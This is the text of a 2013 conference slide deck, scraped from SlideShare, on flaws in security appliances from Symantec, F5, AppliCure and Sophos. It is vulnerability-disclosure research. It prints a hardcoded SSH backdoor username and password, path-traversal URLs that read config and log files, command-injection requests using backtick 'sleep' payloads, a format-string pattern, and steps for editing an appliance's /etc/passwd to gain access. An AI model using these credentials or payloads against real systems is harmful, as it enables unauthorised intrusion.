SlideShare a Scribd company logo
(in)Security Software
By Alexander Antukh
May 26, 2013
/whoami
Alexander Antukh
 Security Consultant
 Offensive Security Certified Expert
 Interests: kittens and stuff
3
Agenda
• Introduction
• What is Security Software
• Historical review
• The Question
• The Answer
• Vuln, where art thou?
• Afterward
• QA
(in)Security Software
4
The question
Do you know anybody less boring?
What if the SS is vulnerable itself?
(in)Security Software
5
The answer
*sorry for my English
(in)Security Software
The answer
• Symantec Messaging Gateway
– Backdoor by design
Code execution
• F5 BIG-IP
– SQL Injection, XXE
Passwords… Root access
• Applicure dotDefender WAF
– Format string vulnerability
Code execution
• Sophos Web Protection Appliance
– LFI, OS Command Injection
Command execution, admin account pwn
Security software products are the target of the trade ... already!
6
(in)Security Software
The answer
“... inbound and outbound messaging security,
with effective and accurate real-time antispam
and antivirus protection, advanced content
filtering, data loss prevention, and email
encryption ...“
Symantec Messaging Gateway
v.9.5.x
SSH?!
Login: support
MD5: 52e3bbafc627009ac13caff1200a0dbf
Password: symantec
7
(in)Security Software
The answer
“... inbound and outbound messaging security,
with effective and accurate real-time antispam
and antivirus protection, advanced content
filtering, data loss prevention, and email
encryption ...“
Symantec Messaging Gateway
v.9.5.x
SSH?!
Login: support
MD5: 52e3bbafc627009ac13caff1200a0dbf
Password: symantec
8
(in)Security Software
The answer
F5 BIG-IP <= 11.2.0
“... from load balancing and service offloading
to acceleration and security, the BIG-IP system
delivers agility—and ensures your applications
are fast, secure, and available ...“
9
(in)Security Software
The answer
F5 BIG-IP <= 11.2.0
“... from load balancing and service offloading
to acceleration and security, the BIG-IP system
delivers agility—and ensures your applications
are fast, secure, and available ...“
10
(in)Security Software
The answer
F5 BIG-IP <= 11.2.0
“... from load balancing and service offloading
to acceleration and security, the BIG-IP system
delivers agility—and ensures your applications
are fast, secure, and available ...“
11
(in)Security Software
The answer
“... from load balancing and service offloading
to acceleration and security, the BIG-IP system
delivers agility—and ensures your applications
are fast, secure, and available ...“
sam/admin/reports/php/getSettings.php 
12
F5 BIG-IP <= 11.2.0
(in)Security Software
The answer
“... dotDefender is a web application security
solution (a Web Application Firewall, or WAF)
that offers strong, proactive security for your
websites and web applications ...“
Web Attack?
13
AppliCure dotDefender WAF <= 4.26
(in)Security Software
14
The answer
• %MAILTO_BLOCK% - email entered in the “Email
address for blocked request report” field
• %RID% - reference ID
• %IP% - server's IP address
• %DATE_TIME% - date of blocked request
Error page can be configured in different ways:
Vars to be added to the body of a custom page:
Looks nice…
AppliCure dotDefender WAF <= 4.26
(in)Security Software
15
The answer
Format string injection
• Variables
• Buffer
• ...
• AP_PRINTF()
check for format string vulnerabilities
… should be
<%IP%> Host: …
Algorithm:
%666dxBAxADxBExEF…
AppliCure dotDefender WAF <= 4.26
(in)Security Software
16
The answer
Format string injection
• Variables
• Buffer
• ...
• AP_PRINTF()
check for format string vulnerabilities
… should be
<%IP%> Host: …
Algorithm:
%666dxBAxADxBExEF…
AppliCure dotDefender WAF <= 4.26
(in)Security Software
17
The answer
“... our award-winning Secure Web Gateway
appliances make web protection easy. They are
quick to setup, simple to manage and make policy
administration a snap, even for non-technical
users...“
Sophos Web Protection
Appliance <= 3.7.8.1
https://<host>/cgi-bin/patience.cgi?id=..
?id=../../persist/config/shared.conf%00
?id=../../log/ui_access_log%00
"https://<host>/index.php?section=configuration&c=configuration&STYLE=8514d0a3c2fc9f8
d47e2988076778153" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:19.0) Gecko/20100101
Firefox/19.0"
Passwords!
(in)Security Software
18
The answer
` POST /index.php?c=diagnostic_tools HTTP/1.1
...
action=wget&section=configuration&STYLE=<validsessid>&url=%60sle
ep%205%60
Diagnostic Tools
“... our award-winning Secure Web Gateway
appliances make web protection easy. They are
quick to setup, simple to manage and make policy
administration a snap, even for non-technical
users...“
Sophos Web Protection
Appliance <= 3.7.8.1
(in)Security Software
19
The answer
` https://<host>/end-user/index.php?reason=application&client-
ip=%20%60sleep+10%60
Block page (%%user_workstation%%“)
“... our award-winning Secure Web Gateway
appliances make web protection easy. They are
quick to setup, simple to manage and make policy
administration a snap, even for non-technical
users...“
Sophos Web Protection
Appliance <= 3.7.8.1
(in)Security Software
20
The answer
POST /index.php?c=local_site_list_editor HTTP/1.1
...
STYLE=<validsessid>&action=save&entries=[{"url"%3a+".'`sleep+10`'"
,+"range"%3a+"no",+"tld"%3a+"yes",+"valid_range"%3a+"no"}]
Local Site List
`
“... our award-winning Secure Web Gateway
appliances make web protection easy. They are
quick to setup, simple to manage and make policy
administration a snap, even for non-technical
users...“
Sophos Web Protection
Appliance <= 3.7.8.1
(in)Security Software
21
The answer
POST /index.php?c=local_site_list_editor HTTP/1.1
...
STYLE=<validsessid>&action=save&entries=[{"url"%3a+".'`sleep+10`'"
,+"range"%3a+"no",+"tld"%3a+"yes",+"valid_range"%3a+"no"}]
Local Site List
`
“... our award-winning Secure Web Gateway
appliances make web protection easy. They are
quick to setup, simple to manage and make policy
administration a snap, even for non-technical
users...“
Sophos Web Protection
Appliance <= 3.7.8.1
(in)Security Software
22
The answer
Sophos Web Protection
Appliance <= 3.7.8.1
(in)Security Software
23
Agenda
• Introduction
• What is Security Software
• Historical review
• The Question
• The Answer
• Vuln, where art thou?
• Afterward
• QA
(in)Security Software
Vuln, where art thou?
• Methods for identifying usable bugs in “Software products”
– Applicaton testing and Fuzzing
– Reverse engineering
– Source code analysis
• A short note on so called “security scanning”
tools
24
(in)Security Software
Vuln, where art thou?
• The workflow for the appliance analysis is pretty simple!
– get a virtual appliance demo version
– install the appliance
– add the .vmdk to another vm and mount it there (or use a linux fs driver
that can mount vmdk files)
– add a new user to /etc/passwd, or change UID/shell/password of existing
users (or maybe change the sudoers file, sshd config)
– start the appliance again and log in :)
– look at the services that are running (and their configuration)
– pwnage ;)
25
(in)Security Software
Vuln, where art thou?
• The workflow for the appliance analysis is pretty simple!
– get a virtual appliance demo version
– install the appliance
– add the .vmdk to another vm and mount it there (or use a linux fs driver
that can mount vmdk files)
– add a new user to /etc/passwd, or change UID/shell/password of existing
users (or maybe change the sudoers file, sshd config)
– start the appliance again and log in :)
– look at the services that are running (and their configuration)
– pwnage ;)
26
(in)Security Software
Vuln, where art thou?
*Move two matches to make it three equal squares
27
(in)Security Software
Vuln, where art thou?
*Move two matches to make it three equal squares
28
(in)Security Software
29
Agenda
• Introduction
• What is Security Software
• Historical review
• The Question
• The Answer
• Vuln, where art thou?
• Afterward
• QA
(in)Security Software
30
Sometimes it’s easier to find the vulnerability
than it might be expected . . .
*doesn’t exist yet
And now for something completely different
(in)Security Software
QA
(in)Security Software

More Related Content

PPTX
An Introduction to PowerShell for Security Assessments
PDF
Hacking IoT with EXPLIoT Framework
PPTX
Enterprise PowerShell for Remote Security Assessments
PDF
BlueHat v17 || Where, how, and why is SSL traffic on mobile getting intercept...
PPTX
Virtualization: Security and IT Audit Perspectives
PDF
Windows server hardening 1
PDF
VMworld 2013: Introducing NSX Service Composer: The New Consumption Model for...
PDF
An easy way into your sap systems v3.0
An Introduction to PowerShell for Security Assessments
Hacking IoT with EXPLIoT Framework
Enterprise PowerShell for Remote Security Assessments
BlueHat v17 || Where, how, and why is SSL traffic on mobile getting intercept...
Virtualization: Security and IT Audit Perspectives
Windows server hardening 1
VMworld 2013: Introducing NSX Service Composer: The New Consumption Model for...
An easy way into your sap systems v3.0

What's hot (20)

PPTX
DFIR Austin Training (Feb 2020): Remote Access & Deploying Agents
PDF
[OWASP Poland Day] Web App Security Architectures
PDF
The hacker playbook: How to think and act like a cybercriminal to reduce risk...
PPTX
Securing your Windows Network with the Microsoft Security Baselines
PDF
CSW2017 Weston miller csw17_mitigating_native_remote_code_execution
PDF
Certified Pre-Owned
PPTX
Presentatie McAfee: Optimale Endpoint Protection 26062015
PPTX
BlueHat v17 || Securing Windows Defender Application Guard
PDF
Web Intrusion Detection
PPTX
Virtualization Security
PPTX
OSSIM User Training: Get Improved Security Visibility with OSSIM
PPTX
BlueHat v17 || Down the Open Source Software Rabbit Hole
PDF
Easy public-private-keys-strong-authentication-using-u2 f
PDF
iOS malware: what's the risk and how to reduce it
PPTX
BlueHat v17 || Raising the Bar: New Hardware Primitives for Exploit Mitigations
PPTX
Best Practices for Configuring Your OSSIM Installation
PDF
Certificate Pinning in Mobile Applications
PPTX
Solving the Open Source Security Puzzle
PPTX
Whats New in OSSIM v2.2?
DFIR Austin Training (Feb 2020): Remote Access & Deploying Agents
[OWASP Poland Day] Web App Security Architectures
The hacker playbook: How to think and act like a cybercriminal to reduce risk...
Securing your Windows Network with the Microsoft Security Baselines
CSW2017 Weston miller csw17_mitigating_native_remote_code_execution
Certified Pre-Owned
Presentatie McAfee: Optimale Endpoint Protection 26062015
BlueHat v17 || Securing Windows Defender Application Guard
Web Intrusion Detection
Virtualization Security
OSSIM User Training: Get Improved Security Visibility with OSSIM
BlueHat v17 || Down the Open Source Software Rabbit Hole
Easy public-private-keys-strong-authentication-using-u2 f
iOS malware: what's the risk and how to reduce it
BlueHat v17 || Raising the Bar: New Hardware Primitives for Exploit Mitigations
Best Practices for Configuring Your OSSIM Installation
Certificate Pinning in Mobile Applications
Solving the Open Source Security Puzzle
Whats New in OSSIM v2.2?
Ad

Viewers also liked (6)

PDF
A Simple Laboratory Environment for Real World Offensive Security Education
PPTX
Kali Linux
PPTX
Taking the offensive Security Leaders V9.1
PDF
Offensive cyber security: Smashing the stack with Python
PDF
IRC Guide by Offensive Security
PDF
Offensive Security with Metasploit
A Simple Laboratory Environment for Real World Offensive Security Education
Kali Linux
Taking the offensive Security Leaders V9.1
Offensive cyber security: Smashing the stack with Python
IRC Guide by Offensive Security
Offensive Security with Metasploit
Ad

Similar to 1.3. (In)security Software (20)

PPTX
Alexander Antukh. (In)security of Appliances
PPTX
Alexander Antukh
PPTX
Exploiting appliances presentation v1.1-vids-removed
PDF
07182013 Hacking Appliances: Ironic exploits in security products
PDF
Web hackingtools cf-summit2014
PPT
Presentation gdl
PPTX
Delivering Security Within the MAX Remote Management Platform - Todd Haughland
PDF
Cybersecurity Concerns You Should be Thinking About
PPT
PDF
Web hackingtools 2015
PDF
Web hackingtools 2015
PPT
The Top 10/20 Internet Security Vulnerabilities – A Primer
PPT
DEVSECOPS_the_beginning.ppt
PPTX
Top Application Security Trends of 2012
PDF
Web Security
PPTX
Web application vulnerability assessment
PPTX
pr-host-intrusion-prevention-customer-presentation (5).pptx
PPTX
How Malware Works - Understanding Software Vulnerabilities
PPT
Secure by design and secure software development
PPTX
Security: more important than ever - Sophos Day Belux 2014
Alexander Antukh. (In)security of Appliances
Alexander Antukh
Exploiting appliances presentation v1.1-vids-removed
07182013 Hacking Appliances: Ironic exploits in security products
Web hackingtools cf-summit2014
Presentation gdl
Delivering Security Within the MAX Remote Management Platform - Todd Haughland
Cybersecurity Concerns You Should be Thinking About
Web hackingtools 2015
Web hackingtools 2015
The Top 10/20 Internet Security Vulnerabilities – A Primer
DEVSECOPS_the_beginning.ppt
Top Application Security Trends of 2012
Web Security
Web application vulnerability assessment
pr-host-intrusion-prevention-customer-presentation (5).pptx
How Malware Works - Understanding Software Vulnerabilities
Secure by design and secure software development
Security: more important than ever - Sophos Day Belux 2014

More from defconmoscow (20)

PDF
7.5. Pwnie express IRL
PDF
7.4. Show impact [bug bounties]
PDF
7.3. iCloud keychain-2
PDF
7.2. Alternative sharepoint hacking
PDF
7.1. SDLC try me to implenment
PDF
6.4. PHD IV CTF final
PDF
6.3. How to get out of an inprivacy jail
PDF
6.2. Hacking most popular websites
PDF
6.1. iCloud keychain and iOS 7 data protection
PDF
6. [Bonus] DCM MI6
PDF
5.3. Undercover communications
PDF
5.2. Digital forensics
PDF
5.1. Flashback [hacking AD]
PDF
5. [Daily hack] Truecrypt
PDF
4.5. Contests [extras]
PDF
4.4. Hashcracking server on generic hardware
PDF
4.3. Rat races conditions
PDF
4.2. Web analyst fiddler
PDF
4.1. Path traversal post_exploitation
PDF
3.3. Database honeypot
7.5. Pwnie express IRL
7.4. Show impact [bug bounties]
7.3. iCloud keychain-2
7.2. Alternative sharepoint hacking
7.1. SDLC try me to implenment
6.4. PHD IV CTF final
6.3. How to get out of an inprivacy jail
6.2. Hacking most popular websites
6.1. iCloud keychain and iOS 7 data protection
6. [Bonus] DCM MI6
5.3. Undercover communications
5.2. Digital forensics
5.1. Flashback [hacking AD]
5. [Daily hack] Truecrypt
4.5. Contests [extras]
4.4. Hashcracking server on generic hardware
4.3. Rat races conditions
4.2. Web analyst fiddler
4.1. Path traversal post_exploitation
3.3. Database honeypot

Recently uploaded (20)

PPTX
1. Introduction to Computer Programming.pptx
PDF
Assigned Numbers - 2025 - Bluetooth® Document
PDF
1 - Historical Antecedents, Social Consideration.pdf
PPTX
A Presentation on Artificial Intelligence
PPTX
Programs and apps: productivity, graphics, security and other tools
PPTX
TLE Review Electricity (Electricity).pptx
PPTX
A Presentation on Touch Screen Technology
PDF
From MVP to Full-Scale Product A Startup’s Software Journey.pdf
PDF
MIND Revenue Release Quarter 2 2025 Press Release
PDF
Approach and Philosophy of On baking technology
PDF
WOOl fibre morphology and structure.pdf for textiles
PDF
Accuracy of neural networks in brain wave diagnosis of schizophrenia
PPTX
cloud_computing_Infrastucture_as_cloud_p
PDF
Transform Your ITIL® 4 & ITSM Strategy with AI in 2025.pdf
PDF
Hindi spoken digit analysis for native and non-native speakers
PPTX
TechTalks-8-2019-Service-Management-ITIL-Refresh-ITIL-4-Framework-Supports-Ou...
PDF
ENT215_Completing-a-large-scale-migration-and-modernization-with-AWS.pdf
PDF
Profit Center Accounting in SAP S/4HANA, S4F28 Col11
PPTX
OMC Textile Division Presentation 2021.pptx
PDF
Microsoft Solutions Partner Drive Digital Transformation with D365.pdf
1. Introduction to Computer Programming.pptx
Assigned Numbers - 2025 - Bluetooth® Document
1 - Historical Antecedents, Social Consideration.pdf
A Presentation on Artificial Intelligence
Programs and apps: productivity, graphics, security and other tools
TLE Review Electricity (Electricity).pptx
A Presentation on Touch Screen Technology
From MVP to Full-Scale Product A Startup’s Software Journey.pdf
MIND Revenue Release Quarter 2 2025 Press Release
Approach and Philosophy of On baking technology
WOOl fibre morphology and structure.pdf for textiles
Accuracy of neural networks in brain wave diagnosis of schizophrenia
cloud_computing_Infrastucture_as_cloud_p
Transform Your ITIL® 4 & ITSM Strategy with AI in 2025.pdf
Hindi spoken digit analysis for native and non-native speakers
TechTalks-8-2019-Service-Management-ITIL-Refresh-ITIL-4-Framework-Supports-Ou...
ENT215_Completing-a-large-scale-migration-and-modernization-with-AWS.pdf
Profit Center Accounting in SAP S/4HANA, S4F28 Col11
OMC Textile Division Presentation 2021.pptx
Microsoft Solutions Partner Drive Digital Transformation with D365.pdf

1.3. (In)security Software

  • 2. /whoami Alexander Antukh  Security Consultant  Offensive Security Certified Expert  Interests: kittens and stuff
  • 3. 3 Agenda • Introduction • What is Security Software • Historical review • The Question • The Answer • Vuln, where art thou? • Afterward • QA (in)Security Software
  • 4. 4 The question Do you know anybody less boring? What if the SS is vulnerable itself? (in)Security Software
  • 5. 5 The answer *sorry for my English (in)Security Software
  • 6. The answer • Symantec Messaging Gateway – Backdoor by design Code execution • F5 BIG-IP – SQL Injection, XXE Passwords… Root access • Applicure dotDefender WAF – Format string vulnerability Code execution • Sophos Web Protection Appliance – LFI, OS Command Injection Command execution, admin account pwn Security software products are the target of the trade ... already! 6 (in)Security Software
  • 7. The answer “... inbound and outbound messaging security, with effective and accurate real-time antispam and antivirus protection, advanced content filtering, data loss prevention, and email encryption ...“ Symantec Messaging Gateway v.9.5.x SSH?! Login: support MD5: 52e3bbafc627009ac13caff1200a0dbf Password: symantec 7 (in)Security Software
  • 8. The answer “... inbound and outbound messaging security, with effective and accurate real-time antispam and antivirus protection, advanced content filtering, data loss prevention, and email encryption ...“ Symantec Messaging Gateway v.9.5.x SSH?! Login: support MD5: 52e3bbafc627009ac13caff1200a0dbf Password: symantec 8 (in)Security Software
  • 9. The answer F5 BIG-IP <= 11.2.0 “... from load balancing and service offloading to acceleration and security, the BIG-IP system delivers agility—and ensures your applications are fast, secure, and available ...“ 9 (in)Security Software
  • 10. The answer F5 BIG-IP <= 11.2.0 “... from load balancing and service offloading to acceleration and security, the BIG-IP system delivers agility—and ensures your applications are fast, secure, and available ...“ 10 (in)Security Software
  • 11. The answer F5 BIG-IP <= 11.2.0 “... from load balancing and service offloading to acceleration and security, the BIG-IP system delivers agility—and ensures your applications are fast, secure, and available ...“ 11 (in)Security Software
  • 12. The answer “... from load balancing and service offloading to acceleration and security, the BIG-IP system delivers agility—and ensures your applications are fast, secure, and available ...“ sam/admin/reports/php/getSettings.php  12 F5 BIG-IP <= 11.2.0 (in)Security Software
  • 13. The answer “... dotDefender is a web application security solution (a Web Application Firewall, or WAF) that offers strong, proactive security for your websites and web applications ...“ Web Attack? 13 AppliCure dotDefender WAF <= 4.26 (in)Security Software
  • 14. 14 The answer • %MAILTO_BLOCK% - email entered in the “Email address for blocked request report” field • %RID% - reference ID • %IP% - server's IP address • %DATE_TIME% - date of blocked request Error page can be configured in different ways: Vars to be added to the body of a custom page: Looks nice… AppliCure dotDefender WAF <= 4.26 (in)Security Software
  • 15. 15 The answer Format string injection • Variables • Buffer • ... • AP_PRINTF() check for format string vulnerabilities … should be <%IP%> Host: … Algorithm: %666dxBAxADxBExEF… AppliCure dotDefender WAF <= 4.26 (in)Security Software
  • 16. 16 The answer Format string injection • Variables • Buffer • ... • AP_PRINTF() check for format string vulnerabilities … should be <%IP%> Host: … Algorithm: %666dxBAxADxBExEF… AppliCure dotDefender WAF <= 4.26 (in)Security Software
  • 17. 17 The answer “... our award-winning Secure Web Gateway appliances make web protection easy. They are quick to setup, simple to manage and make policy administration a snap, even for non-technical users...“ Sophos Web Protection Appliance <= 3.7.8.1 https://<host>/cgi-bin/patience.cgi?id=.. ?id=../../persist/config/shared.conf%00 ?id=../../log/ui_access_log%00 "https://<host>/index.php?section=configuration&c=configuration&STYLE=8514d0a3c2fc9f8 d47e2988076778153" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:19.0) Gecko/20100101 Firefox/19.0" Passwords! (in)Security Software
  • 18. 18 The answer ` POST /index.php?c=diagnostic_tools HTTP/1.1 ... action=wget&section=configuration&STYLE=<validsessid>&url=%60sle ep%205%60 Diagnostic Tools “... our award-winning Secure Web Gateway appliances make web protection easy. They are quick to setup, simple to manage and make policy administration a snap, even for non-technical users...“ Sophos Web Protection Appliance <= 3.7.8.1 (in)Security Software
  • 19. 19 The answer ` https://<host>/end-user/index.php?reason=application&client- ip=%20%60sleep+10%60 Block page (%%user_workstation%%“) “... our award-winning Secure Web Gateway appliances make web protection easy. They are quick to setup, simple to manage and make policy administration a snap, even for non-technical users...“ Sophos Web Protection Appliance <= 3.7.8.1 (in)Security Software
  • 20. 20 The answer POST /index.php?c=local_site_list_editor HTTP/1.1 ... STYLE=<validsessid>&action=save&entries=[{"url"%3a+".'`sleep+10`'" ,+"range"%3a+"no",+"tld"%3a+"yes",+"valid_range"%3a+"no"}] Local Site List ` “... our award-winning Secure Web Gateway appliances make web protection easy. They are quick to setup, simple to manage and make policy administration a snap, even for non-technical users...“ Sophos Web Protection Appliance <= 3.7.8.1 (in)Security Software
  • 21. 21 The answer POST /index.php?c=local_site_list_editor HTTP/1.1 ... STYLE=<validsessid>&action=save&entries=[{"url"%3a+".'`sleep+10`'" ,+"range"%3a+"no",+"tld"%3a+"yes",+"valid_range"%3a+"no"}] Local Site List ` “... our award-winning Secure Web Gateway appliances make web protection easy. They are quick to setup, simple to manage and make policy administration a snap, even for non-technical users...“ Sophos Web Protection Appliance <= 3.7.8.1 (in)Security Software
  • 22. 22 The answer Sophos Web Protection Appliance <= 3.7.8.1 (in)Security Software
  • 23. 23 Agenda • Introduction • What is Security Software • Historical review • The Question • The Answer • Vuln, where art thou? • Afterward • QA (in)Security Software
  • 24. Vuln, where art thou? • Methods for identifying usable bugs in “Software products” – Applicaton testing and Fuzzing – Reverse engineering – Source code analysis • A short note on so called “security scanning” tools 24 (in)Security Software
  • 25. Vuln, where art thou? • The workflow for the appliance analysis is pretty simple! – get a virtual appliance demo version – install the appliance – add the .vmdk to another vm and mount it there (or use a linux fs driver that can mount vmdk files) – add a new user to /etc/passwd, or change UID/shell/password of existing users (or maybe change the sudoers file, sshd config) – start the appliance again and log in :) – look at the services that are running (and their configuration) – pwnage ;) 25 (in)Security Software
  • 26. Vuln, where art thou? • The workflow for the appliance analysis is pretty simple! – get a virtual appliance demo version – install the appliance – add the .vmdk to another vm and mount it there (or use a linux fs driver that can mount vmdk files) – add a new user to /etc/passwd, or change UID/shell/password of existing users (or maybe change the sudoers file, sshd config) – start the appliance again and log in :) – look at the services that are running (and their configuration) – pwnage ;) 26 (in)Security Software
  • 27. Vuln, where art thou? *Move two matches to make it three equal squares 27 (in)Security Software
  • 28. Vuln, where art thou? *Move two matches to make it three equal squares 28 (in)Security Software
  • 29. 29 Agenda • Introduction • What is Security Software • Historical review • The Question • The Answer • Vuln, where art thou? • Afterward • QA (in)Security Software
  • 30. 30 Sometimes it’s easier to find the vulnerability than it might be expected . . . *doesn’t exist yet And now for something completely different (in)Security Software